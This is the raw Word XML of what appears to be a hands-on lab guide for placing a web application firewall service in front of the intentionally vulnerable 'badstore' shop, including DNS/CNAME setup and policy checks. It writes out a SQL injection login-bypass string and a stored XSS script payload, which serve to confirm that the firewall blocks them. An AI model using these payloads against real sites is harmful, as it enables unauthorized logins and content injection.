        <w:t>badstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0034774B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">DNS record </w:t>
      </w:r>
      <w:r w:rsidR="00EA0F90">
        <w:t xml:space="preserve">so that when people go to the original domain name for the backend server, they will get </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CNAMEd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EA0F90">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EA0F90">
        <w:t>WAFaa</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EA0F90">
        <w:t>, as shown in this diagram</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E8CAF7A" wp14:editId="4359404C">
            <wp:extent cx="5454650" cy="28085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4198" cy="2818638"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00EA0F90">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B1CFC2" w14:textId="77777777" w:rsidR="00A44E69" w:rsidRDefault="00A44E69" w:rsidP="00A44E69">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="032A4445" w14:textId="5A601043" w:rsidR="00A44E69" w:rsidRDefault="00BB1043" w:rsidP="00B75A74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On the next screen, you will see </w:t>
      </w:r>
      <w:r w:rsidR="00BD1742">
        <w:t xml:space="preserve">under CNAME, the </w:t>
      </w:r>
      <w:r w:rsidR="00130C05">
        <w:t xml:space="preserve">DNS name for your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00130C05">
        <w:t>WAFaaS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00130C05">
        <w:t xml:space="preserve"> application proxy.  Note that you will also see </w:t>
      </w:r>
      <w:r>
        <w:t>“Your application is still being provisioned” “DNS Update Pending” and “DNS Server Error” this is</w:t>
      </w:r>
      <w:r w:rsidR="00F963FA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F963FA">
        <w:t>(  as</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F963FA">
        <w:t xml:space="preserve"> explained above ) because </w:t>
      </w:r>
      <w:r w:rsidR="00A44E69">
        <w:t xml:space="preserve">we don’t have the ability to go and change the DNS server </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">so </w:t>
      </w:r>
      <w:r w:rsidR="00BD1742">
        <w:t xml:space="preserve">don’t </w:t>
      </w:r>
      <w:r>
        <w:t>worry about it</w:t>
      </w:r>
      <w:r w:rsidR="00A44E69">
        <w:t>, we will just use the CNAME itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB6A6D0" w14:textId="77777777" w:rsidR="00A44E69" w:rsidRDefault="00A44E69" w:rsidP="00A44E69">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B07E6DC" w14:textId="1E8A3D2C" w:rsidR="00A41322" w:rsidRDefault="00D02EC7" w:rsidP="00D02EC7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38598535" wp14:editId="7E0C60B3">
            <wp:extent cx="5472348" cy="1666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8126" cy="1674727"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D05E59" w14:textId="77777777" w:rsidR="00D02EC7" w:rsidRDefault="00D02EC7" w:rsidP="00D02EC7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="001C50DF" w14:textId="77777777" w:rsidR="00A220E2" w:rsidRDefault="00A220E2">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABE6394" w14:textId="6BF8088E" w:rsidR="00F87E14" w:rsidRDefault="00D02EC7" w:rsidP="00D02EC7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Just wait </w:t>
      </w:r>
      <w:r w:rsidR="00C80023">
        <w:t xml:space="preserve">from one to </w:t>
      </w:r>
      <w:r w:rsidR="00132AF4">
        <w:t xml:space="preserve">three </w:t>
      </w:r>
      <w:r>
        <w:t>minute</w:t>
      </w:r>
      <w:r w:rsidR="00132AF4">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>, then y</w:t>
      </w:r>
      <w:r w:rsidR="00BB1043">
        <w:t xml:space="preserve">ou can browse to https://app353482.prod.cudawaas.com </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00130C05">
        <w:t>( use</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00130C05">
        <w:t xml:space="preserve"> your CNAME</w:t>
      </w:r>
      <w:r w:rsidR="00C80023">
        <w:t>, that’s just an example</w:t>
      </w:r>
      <w:r w:rsidR="00130C05">
        <w:t xml:space="preserve"> ) </w:t>
      </w:r>
      <w:r>
        <w:t>and make sure you see the website load</w:t>
      </w:r>
      <w:r w:rsidR="00C80023">
        <w:t xml:space="preserve"> as shown here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0E1BF5" w14:textId="77777777" w:rsidR="00F87E14" w:rsidRDefault="00F87E14" w:rsidP="00F87E14">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="535080FC" w14:textId="3E8CA85B" w:rsidR="00BB1043" w:rsidRDefault="00C80023" w:rsidP="00F87E14">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r w:rsidR="00BB1043">
        <w:t xml:space="preserve">You will </w:t>
      </w:r>
      <w:r w:rsidR="00432FC1">
        <w:t xml:space="preserve">of course </w:t>
      </w:r>
      <w:r w:rsidR="00BB1043">
        <w:t>receive an SSL warning, because of the domain name mismatch, but you can click through it to proceed</w:t>
      </w:r>
      <w:r w:rsidR="00D412E1">
        <w:t xml:space="preserve"> and see the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D412E1">
        <w:t>badstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D412E1">
        <w:t xml:space="preserve"> application</w:t>
      </w:r>
      <w:r w:rsidR="00BB1043">
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00BB1043">
        <w:t>Again</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00BB1043">
        <w:t xml:space="preserve"> as a reminder, in real life, all the domains names will match</w:t>
      </w:r>
      <w:r w:rsidR="00D412E1">
        <w:t xml:space="preserve"> as needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D978E4" w14:textId="66FDF9A4" w:rsidR="00B22B4F" w:rsidRDefault="00A220E2" w:rsidP="00B22B4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="385F04CF" wp14:editId="533BC784">
            <wp:extent cx="4094328" cy="1885753"/>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1069" cy="1907281"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E682FB7" w14:textId="102FC3E9" w:rsidR="00BB1043" w:rsidRDefault="00BB1043" w:rsidP="00432FC1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C5FA0C7" w14:textId="3D9B6D04" w:rsidR="00432FC1" w:rsidRPr="00432FC1" w:rsidRDefault="00432FC1" w:rsidP="00432FC1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Add the “Request </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ReWriting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” component. </w:t>
      </w:r>
      <w:r w:rsidR="004C67A2">
        <w:t xml:space="preserve"> You do not have to change </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004C67A2">
        <w:t>anything,  just</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004C67A2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A220E2">
        <w:t xml:space="preserve">take a look and observe </w:t>
      </w:r>
      <w:r w:rsidR="004C67A2">
        <w:t xml:space="preserve"> that by default the host header is re-written</w:t>
      </w:r>
      <w:r w:rsidR="003B433C">
        <w:t xml:space="preserve"> from the CNAME to the original host to enable us to do testing </w:t>
      </w:r>
      <w:r w:rsidR="00B66107">
        <w:t xml:space="preserve">( and this lab ) </w:t>
      </w:r>
      <w:r w:rsidR="003B433C">
        <w:t xml:space="preserve">as shown here </w:t>
      </w:r>
      <w:r w:rsidR="003B433C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="748E5604" wp14:editId="45B68111">
            <wp:extent cx="4701654" cy="220917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5377" cy="2215623"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44674E3B" w14:textId="77777777" w:rsidR="00092C9C" w:rsidRDefault="00092C9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB7C22B" w14:textId="740379DF" w:rsidR="00233C4A" w:rsidRDefault="00233C4A" w:rsidP="00233C4A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Security Policy</w:t>
      </w:r>
      <w:r w:rsidR="00C649DB">
        <w:t xml:space="preserve"> Detailed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B4BA51" w14:textId="012BCBF6" w:rsidR="00C649DB" w:rsidRDefault="00C649DB">
      <w:r>
        <w:t>We</w:t>
      </w:r>
      <w:r w:rsidR="00BB1043">
        <w:t xml:space="preserve"> will </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">now </w:t>
      </w:r>
      <w:r w:rsidR="00BB1043">
        <w:t xml:space="preserve">set up the detailed security rules.  The set of rules are known as the security policy.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDEE175" w14:textId="77777777" w:rsidR="00F90E1A" w:rsidRDefault="00BB1043">
      <w:r>
        <w:t xml:space="preserve">Note that </w:t>
      </w:r>
      <w:r w:rsidR="00092C9C">
        <w:t xml:space="preserve">some </w:t>
      </w:r>
      <w:r>
        <w:t>of the OWASP Top 10 is on by default, so things like SQL Injection and Cross-Site Scripting are already in the security policy</w:t>
      </w:r>
      <w:r w:rsidR="00F90E1A">
        <w:t xml:space="preserve"> as shown here </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0973A661" w14:textId="60E4A01A" w:rsidR="00092C9C" w:rsidRDefault="00F90E1A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="084B187F" wp14:editId="39A71E6C">
            <wp:extent cx="5943600" cy="3284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4855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C59D18C" w14:textId="77777777" w:rsidR="00F90E1A" w:rsidRDefault="00F90E1A"/>
    <w:p w14:paraId="771BC104" w14:textId="77777777" w:rsidR="00F90E1A" w:rsidRDefault="00F90E1A">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F92132" w14:textId="424B80EF" w:rsidR="003048C0" w:rsidRDefault="003048C0" w:rsidP="003048C0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B49A9BA" w14:textId="1C7F5867" w:rsidR="00683ACD" w:rsidRDefault="00092C9C">
      <w:r>
        <w:t>To test that</w:t>
      </w:r>
      <w:r w:rsidR="00F90E1A">
        <w:t xml:space="preserve"> SQL injection prevention is on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00357709">
        <w:t xml:space="preserve">go to your </w:t>
      </w:r>
      <w:r w:rsidR="00683ACD">
        <w:t xml:space="preserve">web server </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidR="00683ACD" w:rsidRPr="00637DDF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://badstore&lt;student</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00683ACD">
        <w:t xml:space="preserve"> number</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00683ACD">
        <w:t>&gt;.cudathon.com</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B17B43">
        <w:t xml:space="preserve">, click Login / Register, </w:t>
      </w:r>
      <w:r w:rsidR="00357709">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00BB1043">
        <w:t xml:space="preserve">ry entering </w:t>
      </w:r>
      <w:r w:rsidR="006C796E" w:rsidRPr="006C796E">
        <w:t>' or 1=1 #</w:t>
      </w:r>
      <w:r w:rsidR="006C796E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB1043">
        <w:t xml:space="preserve">in the </w:t>
      </w:r>
      <w:r w:rsidR="006C796E">
        <w:t xml:space="preserve">email address, </w:t>
      </w:r>
      <w:r w:rsidR="00442916">
        <w:t xml:space="preserve"> then click </w:t>
      </w:r>
      <w:r w:rsidR="006C796E">
        <w:t xml:space="preserve">Login.  You will be logged in as the “Test User” without knowing their real email address or password, this is a simple example of a SQL injection. </w:t>
      </w:r>
      <w:r w:rsidR="00B17B43">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26A694FA" wp14:editId="0A0A1280">
            <wp:extent cx="5943600" cy="2489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89835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D56CD05" w14:textId="77777777" w:rsidR="00683ACD" w:rsidRDefault="00683ACD"/>
    <w:p w14:paraId="5E75E166" w14:textId="026DCAC9" w:rsidR="00822AE6" w:rsidRDefault="006C796E">
      <w:r>
        <w:t xml:space="preserve">Now try the same thing but this time go to your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007333E7">
        <w:t>WAFaaS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007333E7">
        <w:t xml:space="preserve"> CNAME, to see if it gets blocked. If everything goes well </w:t>
      </w:r>
      <w:r w:rsidR="00822AE6">
        <w:t xml:space="preserve">You will get a block page that looks something like this, because the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00822AE6">
        <w:t>WAFaaS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00822AE6">
        <w:t xml:space="preserve"> sees that you are trying to send a SQL injection attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1815B0" w14:textId="6DB0D872" w:rsidR="00822AE6" w:rsidRDefault="00ED048B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3383FD9B" wp14:editId="4D2D361C">
            <wp:extent cx="5514975" cy="15272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0012" cy="1531388"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0729B91E" w14:textId="505E3F27" w:rsidR="007E615C" w:rsidRDefault="00A902BF">
      <w:r>
        <w:t xml:space="preserve">Go to the Logs component, choose firewall logs, and you will see the log entry with the event ID </w:t>
      </w:r>
      <w:r w:rsidR="00D57F67">
        <w:t xml:space="preserve">and details of the SQL Injection attack </w:t>
      </w:r>
      <w:r>
        <w:t>as shown here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA85127" w14:textId="15BB6218" w:rsidR="00A902BF" w:rsidRDefault="0000459B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58F74A8F" wp14:editId="2005B347">
            <wp:extent cx="5943600" cy="928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28370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AEE824" w14:textId="610C9A79" w:rsidR="0000459B" w:rsidRDefault="0000459B">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8EF54A" w14:textId="77777777" w:rsidR="0000459B" w:rsidRDefault="0000459B"/>
    <w:p w14:paraId="409BA73E" w14:textId="346BFE99" w:rsidR="007333E7" w:rsidRDefault="007333E7" w:rsidP="00F90E1A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Cross-Site Scripting aka XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DD5D9A" w14:textId="77777777" w:rsidR="006B1901" w:rsidRDefault="006B1901" w:rsidP="006B1901">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="30DB4EA1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>The customer reports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5CA8D9" w14:textId="77777777" w:rsidR="006B1901" w:rsidRDefault="006B1901" w:rsidP="006B1901">
      <w:pPr>
        <w:pStyle w:val="Quote"/>
      </w:pPr>
      <w:r w:rsidRPr="32F6121D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">People are complaining they are getting viruses and strange behavior when they go to my website. They are not going to shop with me if they cannot trust the reputation of my online store. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C666BF" w14:textId="77777777" w:rsidR="006B1901" w:rsidRDefault="006B1901" w:rsidP="006B1901">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="30DB4EA1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>How can you fix this?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609F2123" w14:textId="77777777" w:rsidR="00457F40" w:rsidRDefault="003A2A06" w:rsidP="006B1901">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Let’s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> do </w:t>
      </w:r>
      <w:r w:rsidR="006B1901" w:rsidRPr="30DB4EA1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">a XSS injection in your browser against </w:t>
      </w:r>
      <w:r w:rsidR="00457F40">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">your WAF CNAME first, to see that the WAF prevents this from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00457F40">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>happening.</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5DEBB902" w14:textId="77777777" w:rsidR="00B35D5D" w:rsidRDefault="00B35D5D" w:rsidP="006B1901">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Go to your WAF CNAME.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BE2C7E" w14:textId="0113568B" w:rsidR="006B1901" w:rsidRDefault="006B1901" w:rsidP="006B1901">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="30DB4EA1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">The comment field of the guestbook is vulnerable to </w:t>
      </w:r>
      <w:r w:rsidR="00457F40">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS injection, </w:t>
      </w:r>
      <w:r w:rsidR="00463776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">so </w:t>
      </w:r>
      <w:r w:rsidR="0044252F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>click on Sign Guestbook</w:t>
      </w:r>
      <w:r w:rsidR="0044252F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00463776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>put in your name and some email address, and leave a comment with this as the comment text</w:t>
      </w:r>
      <w:r w:rsidR="00457F40">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00457F40">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>( you</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00457F40">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DD0E51">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">can copy and paste it, but you </w:t>
      </w:r>
      <w:r w:rsidR="00457F40">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">might have to fix up those single quotes due to copy and paste issues </w:t>
      </w:r>
      <w:r w:rsidR="00DD0E51">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>make sure they are just single quotes ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761C35B1" w14:textId="5547939F" w:rsidR="007333E7" w:rsidRDefault="001E79D3" w:rsidP="001E79D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E79D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001E79D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001E79D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'go to terriblestore.com for lower prices!');&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
